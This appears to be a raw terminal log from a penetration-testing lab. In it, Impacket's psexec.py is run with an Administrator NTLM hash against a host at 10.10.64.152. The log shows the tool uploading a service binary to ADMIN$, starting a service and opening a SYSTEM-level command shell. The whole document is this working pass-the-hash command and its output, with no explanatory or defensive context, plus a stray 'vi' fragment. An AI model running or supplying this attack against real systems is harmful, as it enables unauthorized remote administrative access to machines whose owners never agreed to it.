└─$ sudo python3 /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8f81ee5558e2d1205a84d07b0e3b34f5 Administrator@10.10.64.152
Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 10.10.64.152.....
[*] Found writable share ADMIN$
[*] Uploading file NygfBKyb.exe
[*] Opening SVCManager on 10.10.64.152.....
[*] Creating service tZJS on 10.10.64.152.....
[*] Starting service tZJS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on 10.10.64.152.....
vi [*] Stopping service tZJS.....
[*] Removing service tZJS.....
[*] Removing file NygfBKyb.exe.....

